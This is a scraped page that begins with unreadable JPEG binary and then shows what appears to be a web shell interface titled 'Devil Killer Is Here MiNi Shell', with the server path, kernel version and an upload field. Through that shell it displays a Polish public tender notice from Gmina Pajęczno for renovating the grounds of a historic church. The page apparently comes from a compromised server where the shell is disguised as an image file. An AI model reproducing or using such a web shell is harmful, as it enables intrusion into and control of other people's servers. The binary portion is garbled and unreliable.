JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230919/0040218201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i przebudowa elementów zagospodarowania otoczenia zabytkowego kościoła </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pajęczno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398652</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 8/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pajęczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0343111523</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0343111523</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@pajeczno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pajeczno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rzymskokatolicka Parafia pw. Wniebowzięcia Najświętszej Maryi Panny w Pajęcznie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">5741527157</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dworcowy 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pajęczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0343111512</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0343111512</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">parafia@wnmp.org.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://wnmp.org.pl/kl-107.html</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Niniejsze postępowanie na podstawie art. 38 ust. 1 ustawy Prawo zamówień publicznych przeprowadza Gmina Pajęczno w imieniu i na rzecz Rzymskokatolickiej Parafii pw. Wniebowzięcia Najświętszej Maryi Panny w Pajęcznie. Umowa w sprawie przedmiotowego zamówienia publicznego zostanie podpisana przez osobę uprawnioną do reprezentowania w/w podmiotu</p> <h3 class="mb-0">1.10.) Właściwe przepisy w przypadku wspólnego udzielania zamówień z zamawiającymi z innych państw członkowskich UE</h3> <p class="mb-0">nie dotyczy</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i przebudowa elementów zagospodarowania otoczenia zabytkowego kościoła </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb25d778-56bc-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00402182</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00036855/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Remont i przebudowa elementów zagospodarowania otoczenia zabytkowego kościoła</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/transakcja/819987 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/transakcja/819987</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 8.1.1 W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu platformy zakupowej<br/>platformazakupowa.pl pod adresem: https://www.platformazakupowa.pl/transakcja/819987 lub poczty elektronicznej<br/>um@pajeczno.pl 8.3.1 W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a wykonawcami w<br/>szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt. 8.2.), zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem https://www.platformazakupowa.pl/transakcja/819987 i formularza „Wyślij wiadomość<br/>do zamawiającego”.<br/>8.3.2 Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, email: um@pajeczno.pl<br/>8.3.3 Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”<br/>jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty<br/>elektronicznej, na wskazany w pkt. 8.3.2. adres email. 8.2.7 Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem<br/>dedykowanych formularzy do: złożenia, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie<br/>500 MB. 1.8 Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://www.platformazakupowa.pl/transakcja/819987</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z RODO tj. rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1).<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PI.271.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 500000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Remont i przebudowa elementów otoczenia zabytkowego kościoła.<br/>3.2 Zakres robót obejmuje:<br/>Pierwszy etap robót z dokumentacji projektowej tj: Pierwszy etap obejmuje głównie roboty dotyczące dojść i dojazdu do<br/>budynku kościoła i kaplicy przedpogrzebowej z terenu parkingu oraz obejście kościoła. Linia podziału terenu na części<br/>objęte poszczególnymi etapami robót naniesiona na rysunek nr 1.<br/>Roboty ziemne i nawierzchniowe.<br/>1) Rozbiórka nawierzchni z betonowej kostki brukowej do powtórnego wykorzystania.<br/>Ogłoszenie nr 2023/BZP 00376046/01 z dnia 2023-08-31<br/>2023-08-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>2) Wykonanie koryta pod nawierzchnię utwardzone dla komunikacji pieszej, o głębokości 30 cm.<br/>3) Wykonanie koryta pod nawierzchnię utwardzone dla komunikacji kołowej, o głębokości 50 cm. 4) Profilowanie i<br/>zagęszczenie podłoża koryt pod nawierzchnie.<br/>5) Ułożenie obrzeży granitowych, szarych, o wymiarach: szerokość 8 cm, wysokość 30 cm, na podsypce cementowo piaskowej.<br/>6) Wykonanie podbudowy pomocniczej, mechanicznie stabilizowanej, o grubości 20 cm, z tłucznia kamiennego frakcji 31,5-<br/>63 mm.<br/>7) Wykonanie podbudowy zasadniczej, mechanicznie stabilizowanej, o grubości 20 cm, z tłucznia kamiennego frakcji 0-31,5<br/>mm.<br/>8) Wykonanie nawierzchni z granitowej kostki brukowej, szarej, łamanej, o wymiarach 8/11 cm, układanej na podsypce<br/>cementowo-piaskowej (1:3), ze spoinami wypełnionymi piaskiem granitowym frakcji 0-4 mm.<br/>9) Wykonanie nawierzchni z płyt granitowych, szarych, płomieniowanych, o wymiarach 60x60x6 cm, układanych na<br/>podsypce cementowo-piaskowej (1:3).<br/>10) Ułożenie agrotkaniny jako zabezpieczenia przed wegetacją roślin w obszarze opaski okapowej. 11) Ułożenie warstwy<br/>grysu gnejsowego (kora kamienna) frakcji 31,5-63 mm, o grubości 8 cm, jako nawierzchni opaski okapowej.<br/>12) W ramach zadania wykonawca zapewni nadzór archeologiczny zgodnie z Opinia WUOZ<br/>w Łodzi.<br/>Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową opracowaną przez Mariusz Błażewicz<br/>Pracownia Architektoniczna z siedzibą ul. Skłodowskiej – Curie 13/23 lok 27, 42-217 Częstochowa wraz z specyfikacjami<br/>technicznymi wykonania i odbioru robót oraz zasadami wiedzy technicznej.<br/>3.3 Przedmiot zamówienia obejmuje realizację projektu zgodnie z podanym zakresem.<br/>3.4 Rozwiązania równoważne:<br/>Zamawiający informuje, że tam, gdzie w SWZ opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3<br/>Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą słowa „lub<br/>równoważne”. Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w stosunku do<br/>opisanych w opisie przedmiotu zamówienia i wykazania równoważności leży po stronie wykonawcy. W przypadku gdy<br/>wymagania w opisie przedmiotu zamówienia odnoszą się do norm, europejskich ocen technicznych, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, a Wykonawca oferuje<br/>rozwiązania równoważne wskazanym, Zamawiający wymaga, aby wykonawca przedstawił już w jego ofercie dowody<br/>równoważności w sposób określony w art. 101 ust. 5 i 6 Pzp.<br/>3.5 Szczegółowy opis przedmiotu zamówienia zawiera Rozdział V do SWZ na który składają się:<br/>- Projekty budowlane,<br/>- Szczegółowa Specyfikacja techniczna Wykonania i Odbioru Robót;<br/>- Przedmiary Robót;<br/>- Zgłoszenie budowy lub wykonania innych robót budowlanych;<br/>- Opinia WUOZ w Łodzi.<br/>Uwaga: Przedmiary robót zostały załączone w celach informacyjnych nie stanowią one podstaw do obliczenia ceny przez<br/>Wykonawcę.<br/>Przed rozpoczęciem robót Wykonawca zobowiązany jest:<br/>- oznakować teren budowy (tablice informacyjne, ostrzegawcze),<br/>- powiadomić właścicieli działek sąsiednich i ewentualne osoby przebywające na działkach sąsiednich o prowadzonych<br/>robotach,<br/>Prace uzupełniające wymagane przez Zamawiającego:<br/>1) Wykonanie pełnej obsługi geodezyjnej inwestycji,<br/>2) Wykonanie dokumentacji odbiorowej w dwóch egzemplarzach w języku polskim z podziałem na branże (oprawionej w<br/>segregatory z szczegółowym spisem treści) zawierającej co najmniej:<br/>a) pozwolenie na użytkowanie lub zgłoszenie do użytkowania do PINB przyjęte bez sprzeciwu (jeżeli dotyczy),<br/>b) oryginał/kserokopię dziennika budowy,<br/>c) mapy geodezyjne powykonawcze z pieczątkami potwierdzającymi wniesienie do zasobu geodezyjnego przez Ośrodek<br/>Dokumentacji Kartograficznej i Geodezyjnej,<br/>d) oryginał pisemnego oświadczenia Kierownika Budowy:<br/>- o wykonaniu robót zgodnie z projektem budowlanym, ostateczną decyzją Pozwolenia na budowę oraz ustawą Prawo<br/>budowlane,<br/>- o doprowadzeniu do należytego stanu i porządku Terenu budowy, a także dróg, ulic, sąsiednich nieruchomości, budynków<br/>i/lub lokali,<br/>- o odpowiednim zagospodarowaniu terenów przyległych do budowy umożliwiającym właściwą eksploatację wybudowanego<br/>obiektu.<br/>e) zestawienie wbudowanych materiałów wraz z dokumentami potwierdzającymi dopuszczenie ich do stosowania na terenie<br/>Rzeczpospolitej Polskiej,<br/>f) oryginał/kopię projektu budowlanego powykonawczego - podpisanego przez Kierownika Budowy/Kierowników Robót,<br/>g) wykaz zmian istotnych (jeżeli miały miejsce) z załącznikiem graficznym, podpisany przez Kierownika Budowy, Kierownika<br/>Ogłoszenie nr 2023/BZP 00376046/01 z dnia 2023-08-31<br/>2023-08-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Robót odpowiedniego do charakterystyki branży, której dotyczy zmiana, Inspektora Nadzoru, Projektanta, wraz z<br/>dokumentami potwierdzającymi prawidłową legalizację tych zmian,<br/>h) protokoły z badań wykonanych w trakcie realizacji prac budowlanych,<br/>i) wersję elektroniczną (w ilości zgodnej z wersją papierową) dokumentów odbiorowych oraz dokumentacji powykonawczej<br/>(inwentaryzacja w formacie pdf.) na płycie CD/DVD,<br/>j) „Instrukcję użytkowania i eksploatacji obiektu” wraz z wykazem wbudowanych urządzeń, które wymagają przeglądów<br/>serwisowych,<br/>k) wszelkie instrukcje obsługi oraz DTR urządzeń (w języku polskim), wraz z potwierdzeniem wykonania szkoleń w zakresie<br/>obsługi tych urządzeń.<br/>3.6 Zamawiający nie dokonuje podziału zamówienia na części :<br/>Zamawiający nie dokonuje podziału zamówienia na części. Tym samym Zamawiający nie dopuszcza możliwości składania<br/>ofert częściowych, o których mowa w art. 7 pkt 15 Pzp. Każdy Wykonawca ma prawo złożyć tylko jedną ofertę. Za<br/>równoznaczne ze złożeniem więcej niż jednej oferty przez tego samego Wykonawcę zostanie uznana sytuacja, w której ten<br/>sam podmiot występuje w dwóch lub więcej ofertach składanych wspólnie lub jest samodzielnym Wykonawcą, a<br/>jednocześnie jest uczestnikiem wspólnej oferty. Wydzielenie części zamówienia wobec niewielkiego zakresu całego<br/>zamówienia, krótki czas realizacji zamówienia spowodowałaby konieczność koordynacji robót kilku wykonawców przez<br/>Zamawiającego i może stanowić ryzyko nieterminowego zakończenia robót. Przedmiotowe zamówienie jest zamówieniem o<br/>zakresie realnym do wykonania przez MŚP, a nawet przez mikroprzedsiębiorcę, o którym mowa w art. 7 ust. 1 pkt. 1)<br/>ustawy z dnia 6 marca 2018r. Prawo przedsiębiorców. Reasumując, w przedmiotowym postępowaniu podział zamówienia<br/>na części nie przyniósłby Zamawiającemu, ani Wykonawcom korzyści, a także ze względu na zakres i wartość zamówienia<br/>nie doprowadziłby do otwarcia postępowania na konkurencję. Dopiero wykonanie zamówienia w całości pozwoli na ocenę<br/>prawidłowości jego wykonania. W ocenie Zamawiającego przedmiot zamówienia uzasadnia udzielenie zamówienia jednemu<br/>wykonawcy, który przyjmie na siebie odpowiedzialność za ryzyko i wszelkie niepowodzenia, a dokonanie podziału<br/>zamówienia na części mogłoby to ryzyko przenieść na Zamawiającego i w konsekwencji uczynić niemożliwym osiągnięcie<br/>celu zamówienia publicznego. Realizacja zamówienia przez kilku wykonawców stanowi również utrudnienie w korzystaniu z<br/>uprawnień z tytułu rękojmi i gwarancji jakości.<br/>Ze względów organizacyjnych i logistycznych zamówienie powinno być wykonane przez jednego Wykonawcę. Brak podziału<br/>na części nie ogranicza udziału firm z sektora małych i średnich przedsiębiorstw, jak również nie wpływa na zmianę kręgu<br/>wykonawców mogących ubiegać się o zamówienie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111213-4 - Roboty w zakresie oczyszczania terenu</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na podstawie art.<br/>226 Pzp.<br/>17.2. Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1) cena oferty (C) – 100%<br/>17.3. Sposób oceny ofert:<br/>kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie<br/>zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>Ogłoszenie nr 2023/BZP 00376046/01 z dnia 2023-08-31<br/>2023-08-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>100 – wskaźnik stały<br/>100 – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez<br/>cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 